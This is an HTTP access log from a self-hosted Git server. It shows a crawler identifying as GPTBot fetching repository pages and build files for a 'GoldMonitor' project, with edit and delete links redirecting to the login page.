-] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build" -[17/Feb/2026:18:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10900] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10894] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10895] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10892] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13369] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9795] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9798] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9795] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9799] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 11112] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 11113] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 11113] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:25:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107388] [Gzip 18.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 109005] [Gzip 18.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108622] [Gzip 18.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:26:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:26:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:26:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:26:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:26:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:26:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:26:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:18:26:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:18:26:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:18:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 